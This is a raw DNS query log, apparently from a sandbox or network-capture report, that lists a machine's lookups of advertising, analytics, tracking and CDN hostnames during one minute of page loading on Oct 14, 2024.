                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:32.091098070 CEST192.168.2.71.1.1.10xe915Standard query (0)cdn.rawgit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.154469967 CEST192.168.2.71.1.1.10x3e71Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.155766964 CEST192.168.2.71.1.1.10x3f96Standard query (0)s4.histats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.166486979 CEST192.168.2.71.1.1.10xafd4Standard query (0)s10.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.167273998 CEST192.168.2.71.1.1.10xe4e6Standard query (0)s10.histats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.267971992 CEST192.168.2.71.1.1.10x9e10Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.268553972 CEST192.168.2.71.1.1.10x36e9Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.348625898 CEST192.168.2.71.1.1.10xd66dStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.349261045 CEST192.168.2.71.1.1.10x5383Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.543471098 CEST192.168.2.71.1.1.10xd2caStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.543773890 CEST192.168.2.71.1.1.10x288cStandard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.904867887 CEST192.168.2.71.1.1.10x12eStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.905781984 CEST192.168.2.71.1.1.10xab68Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.967308044 CEST192.168.2.71.1.1.10xbff1Standard query (0)e.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.967948914 CEST192.168.2.71.1.1.10xc454Standard query (0)e.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.998841047 CEST192.168.2.71.1.1.10x9cf6Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:33.999145031 CEST192.168.2.71.1.1.10x3e60Standard query (0)s4.histats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.166261911 CEST192.168.2.71.1.1.10xeb80Standard query (0)t.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.166421890 CEST192.168.2.71.1.1.10x6326Standard query (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.185194016 CEST192.168.2.71.1.1.10xdba1Standard query (0)pxdrop.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.185345888 CEST192.168.2.71.1.1.10x7ad4Standard query (0)pxdrop.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.185818911 CEST192.168.2.71.1.1.10x58cdStandard query (0)pd.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.185967922 CEST192.168.2.71.1.1.10x376cStandard query (0)pd.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.186289072 CEST192.168.2.71.1.1.10xef2Standard query (0)cdn.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.186415911 CEST192.168.2.71.1.1.10x6a9aStandard query (0)cdn.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.197011948 CEST192.168.2.71.1.1.10x70e0Standard query (0)t.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.197158098 CEST192.168.2.71.1.1.10x4142Standard query (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.871829033 CEST192.168.2.71.1.1.10x930Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:35.873610973 CEST192.168.2.71.1.1.10x9224Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.340245962 CEST192.168.2.71.1.1.10xf494Standard query (0)ic.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.340920925 CEST192.168.2.71.1.1.10x4a3eStandard query (0)ic.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.374988079 CEST192.168.2.71.1.1.10x82a8Standard query (0)t.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.375449896 CEST192.168.2.71.1.1.10x831cStandard query (0)t.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.378422976 CEST192.168.2.71.1.1.10x1d13Standard query (0)pxdrop.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.379338980 CEST192.168.2.71.1.1.10x214cStandard query (0)pxdrop.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.534959078 CEST192.168.2.71.1.1.10x35c3Standard query (0)de.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:36.535140991 CEST192.168.2.71.1.1.10xf64fStandard query (0)de.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.018887043 CEST192.168.2.71.1.1.10x9bf7Standard query (0)tags.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.019800901 CEST192.168.2.71.1.1.10x20bcStandard query (0)tags.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.040365934 CEST192.168.2.71.1.1.10x7583Standard query (0)t.dtscdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.040776968 CEST192.168.2.71.1.1.10x35d9Standard query (0)t.dtscdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.041491032 CEST192.168.2.71.1.1.10x18b3Standard query (0)pixel.onaudience.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.041727066 CEST192.168.2.71.1.1.10xe4c6Standard query (0)pixel.onaudience.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.168395996 CEST192.168.2.71.1.1.10xb7adStandard query (0)fundingchoicesmessages.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.168596983 CEST192.168.2.71.1.1.10xa711Standard query (0)fundingchoicesmessages.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.336286068 CEST192.168.2.71.1.1.10x4dbbStandard query (0)cdn-tc.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.336419106 CEST192.168.2.71.1.1.10x63f7Standard query (0)cdn-tc.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.336769104 CEST192.168.2.71.1.1.10x381Standard query (0)rc.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.336904049 CEST192.168.2.71.1.1.10xd655Standard query (0)rc.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.337565899 CEST192.168.2.71.1.1.10xf937Standard query (0)i.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.337724924 CEST192.168.2.71.1.1.10xe919Standard query (0)i.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.369818926 CEST192.168.2.71.1.1.10xa820Standard query (0)e.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.369971037 CEST192.168.2.71.1.1.10xfc5bStandard query (0)e.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.374218941 CEST192.168.2.71.1.1.10x2d8fStandard query (0)t.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.374744892 CEST192.168.2.71.1.1.10x962Standard query (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.378360987 CEST192.168.2.71.1.1.10x2063Standard query (0)cdn.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.378500938 CEST192.168.2.71.1.1.10x76b9Standard query (0)cdn.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.380873919 CEST192.168.2.71.1.1.10x2733Standard query (0)pd.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.380995035 CEST192.168.2.71.1.1.10xbb81Standard query (0)pd.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.382386923 CEST192.168.2.71.1.1.10x1a24Standard query (0)pxdrop.lijit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.382553101 CEST192.168.2.71.1.1.10x8d01Standard query (0)pxdrop.lijit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398757935 CEST192.168.2.71.1.1.10x18c0Standard query (0)ic.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398926973 CEST192.168.2.71.1.1.10xb9a4Standard query (0)ic.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.588898897 CEST192.168.2.71.1.1.10xb72bStandard query (0)t.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.589041948 CEST192.168.2.71.1.1.10x4808Standard query (0)t.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.761976004 CEST192.168.2.71.1.1.10x97cStandard query (0)de.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.762516022 CEST192.168.2.71.1.1.10x93d1Standard query (0)de.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.800843954 CEST192.168.2.71.1.1.10x2afeStandard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.801018953 CEST192.168.2.71.1.1.10x396cStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.925935984 CEST192.168.2.71.1.1.10x6d0dStandard query (0)t.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.926083088 CEST192.168.2.71.1.1.10x2321Standard query (0)t.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.937696934 CEST192.168.2.71.1.1.10xaa2dStandard query (0)t.dtscdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.937870979 CEST192.168.2.71.1.1.10xbf34Standard query (0)t.dtscdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.981597900 CEST192.168.2.71.1.1.10x8a5cStandard query (0)tags.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.981952906 CEST192.168.2.71.1.1.10x191aStandard query (0)tags.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.043421984 CEST192.168.2.71.1.1.10x536Standard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.043584108 CEST192.168.2.71.1.1.10xa3a9Standard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.294080973 CEST192.168.2.71.1.1.10xf260Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.294754028 CEST192.168.2.71.1.1.10x8f47Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.310873985 CEST192.168.2.71.1.1.10xc7bfStandard query (0)tags.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.311131954 CEST192.168.2.71.1.1.10x3595Standard query (0)tags.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.670483112 CEST192.168.2.71.1.1.10x5832Standard query (0)fundingchoicesmessages.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.670620918 CEST192.168.2.71.1.1.10x86c6Standard query (0)fundingchoicesmessages.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.686937094 CEST192.168.2.71.1.1.10xcc87Standard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.687576056 CEST192.168.2.71.1.1.10x59a8Standard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.487071991 CEST192.168.2.71.1.1.10xfcd1Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.487225056 CEST192.168.2.71.1.1.10x1652Standard query (0)p.adsymptotic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.495831966 CEST192.168.2.71.1.1.10x6d73Standard query (0)p.adsymptotic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.499627113 CEST192.168.2.71.1.1.10x293aStandard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.507049084 CEST192.168.2.71.1.1.10xc741Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.563124895 CEST192.168.2.71.1.1.10xc074Standard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.563616991 CEST192.168.2.71.1.1.10x30cdStandard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.595598936 CEST192.168.2.71.1.1.10xf1e1Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.595905066 CEST192.168.2.71.1.1.10x371aStandard query (0)p.adsymptotic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.605127096 CEST192.168.2.71.1.1.10x7f28Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.605612040 CEST192.168.2.71.1.1.10xdc6aStandard query (0)p.adsymptotic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.617038012 CEST192.168.2.71.1.1.10xe2eeStandard query (0)bcp.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.617358923 CEST192.168.2.71.1.1.10x4294Standard query (0)bcp.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.451787949 CEST192.168.2.71.1.1.10xfc2cStandard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.452361107 CEST192.168.2.71.1.1.10x162aStandard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.730362892 CEST192.168.2.71.1.1.10x98d1Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.730992079 CEST192.168.2.71.1.1.10x1ffaStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.736124039 CEST192.168.2.71.1.1.10xebdaStandard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.736720085 CEST192.168.2.71.1.1.10x89fdStandard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737380981 CEST192.168.2.71.1.1.10x16a6Standard query (0)ps.eyeota.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737759113 CEST192.168.2.71.1.1.10x42a1Standard query (0)ps.eyeota.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.738487005 CEST192.168.2.71.1.1.10x40bdStandard query (0)ml314.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.738800049 CEST192.168.2.71.1.1.10xfbe3Standard query (0)ml314.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.763747931 CEST192.168.2.71.1.1.10xf78bStandard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.764137983 CEST192.168.2.71.1.1.10xece5Standard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.076510906 CEST192.168.2.71.1.1.10xa222Standard query (0)bcp.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.076647043 CEST192.168.2.71.1.1.10xec4cStandard query (0)bcp.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.454041004 CEST192.168.2.71.1.1.10xa545Standard query (0)sync.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.454248905 CEST192.168.2.71.1.1.10xd193Standard query (0)sync.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.631952047 CEST192.168.2.71.1.1.10x966dStandard query (0)sync.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.632133007 CEST192.168.2.71.1.1.10x7a4cStandard query (0)sync.sharethis.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.648438931 CEST192.168.2.71.1.1.10xf205Standard query (0)ml314.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.648591995 CEST192.168.2.71.1.1.10x34c4Standard query (0)ml314.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:43.442904949 CEST192.168.2.71.1.1.10xe201Standard query (0)my7recovery.blogspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:43.443172932 CEST192.168.2.71.1.1.10x2812Standard query (0)my7recovery.blogspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.612544060 CEST192.168.2.71.1.1.10xa134Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.612806082 CEST192.168.2.71.1.1.10x7b9Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.616749048 CEST192.168.2.71.1.1.10x3a09Standard query (0)get.managedmethods.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.616915941 CEST192.168.2.71.1.1.10x1ce4Standard query (0)get.managedmethods.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.033494949 CEST192.168.2.71.1.1.10x585fStandard query (0)my7recovery.blogspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.033638000 CEST192.168.2.71.1.1.10x4fa7Standard query (0)my7recovery.blogspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.255876064 CEST192.168.2.71.1.1.10x6755Standard query (0)bcp.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.256257057 CEST192.168.2.71.1.1.10xa158Standard query (0)bcp.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.624856949 CEST192.168.2.71.1.1.10xf940Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.625818968 CEST192.168.2.71.1.1.10x1587Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.651767015 CEST192.168.2.71.1.1.10x4efcStandard query (0)7052064.fs1.hubspotusercontent-na1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.652029037 CEST192.168.2.71.1.1.10x8a70Standard query (0)7052064.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.011966944 CEST192.168.2.71.1.1.10xe1baStandard query (0)get.managedmethods.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.012631893 CEST192.168.2.71.1.1.10xf1a9Standard query (0)get.managedmethods.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.429470062 CEST192.168.2.71.1.1.10x30cfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.430002928 CEST192.168.2.71.1.1.10xe0b2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.159004927 CEST192.168.2.71.1.1.10xb523Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.159607887 CEST192.168.2.71.1.1.10x24d9Standard query (0)www.w3schools.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.805600882 CEST192.168.2.71.1.1.10xed28Standard query (0)static.hsappstatic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.806389093 CEST192.168.2.71.1.1.10x4cc7Standard query (0)static.hsappstatic.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.603806019 CEST192.168.2.71.1.1.10x9b0bStandard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.604020119 CEST192.168.2.71.1.1.10xa768Standard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.711931944 CEST192.168.2.71.1.1.10x457Standard query (0)static.hsappstatic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.712203026 CEST192.168.2.71.1.1.10xc4f7Standard query (0)static.hsappstatic.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.553296089 CEST192.168.2.71.1.1.10x476dStandard query (0)script.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.553296089 CEST192.168.2.71.1.1.10xd49cStandard query (0)script.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.553849936 CEST192.168.2.71.1.1.10x60ebStandard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.554215908 CEST192.168.2.71.1.1.10xf444Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.028970957 CEST192.168.2.71.1.1.10x8dddStandard query (0)js.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.029515982 CEST192.168.2.71.1.1.10xaa25Standard query (0)js.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.034778118 CEST192.168.2.71.1.1.10x2df7Standard query (0)js.usemessages.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.035288095 CEST192.168.2.71.1.1.10x27f8Standard query (0)js.usemessages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.035968065 CEST192.168.2.71.1.1.10xe278Standard query (0)js.hs-analytics.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.035968065 CEST192.168.2.71.1.1.10x9c91Standard query (0)js.hs-analytics.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.037030935 CEST192.168.2.71.1.1.10x2f5cStandard query (0)js.hsleadflows.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.037030935 CEST192.168.2.71.1.1.10xd377Standard query (0)js.hsleadflows.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.037504911 CEST192.168.2.71.1.1.10xc056Standard query (0)js.hsadspixel.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.037625074 CEST192.168.2.71.1.1.10x6561Standard query (0)js.hsadspixel.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.038286924 CEST192.168.2.71.1.1.10x752aStandard query (0)js.hs-banner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.039038897 CEST192.168.2.71.1.1.10x478cStandard query (0)js.hs-banner.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.039038897 CEST192.168.2.71.1.1.10x2793Standard query (0)js.hscollectedforms.netA (IP address)IN (0x0001)false
